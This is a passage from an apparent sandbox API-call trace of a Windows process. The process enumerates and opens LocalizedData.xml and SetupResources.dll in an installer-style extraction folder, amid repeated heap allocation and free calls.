InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.490] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.491] AreFileApisANSI () returned 1 [0061.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.492] AreFileApisANSI () returned 1 [0061.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0061.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 45 [0061.492] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.492] GetFileType (hFile=0x41c) returned 0x1 [0061.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.492] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.492] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.493] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.493] CloseHandle (hObject=0x41c) returned 1 [0061.493] AreFileApisANSI () returned 1 [0061.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0061.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 45 [0061.493] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.493] GetFileType (hFile=0x41c) returned 0x1 [0061.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.493] CloseHandle (hObject=0x41c) returned 1 [0061.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.494] AreFileApisANSI () returned 1 [0061.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0061.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 45 [0061.494] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a)) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.494] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.494] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.494] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.495] AreFileApisANSI () returned 1 [0061.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0061.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.496] AreFileApisANSI () returned 1 [0061.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0061.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 46 [0061.496] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.496] GetFileType (hFile=0x41c) returned 0x1 [0061.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.496] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.496] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.496] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.497] CloseHandle (hObject=0x41c) returned 1 [0061.497] AreFileApisANSI () returned 1 [0061.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0061.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 46 [0061.497] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.497] GetFileType (hFile=0x41c) returned 0x1 [0061.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.497] CloseHandle (hObject=0x41c) returned 1 [0061.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.498] AreFileApisANSI () returned 1 [0061.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b68 [0061.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 46 [0061.498] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.498] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.498] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, 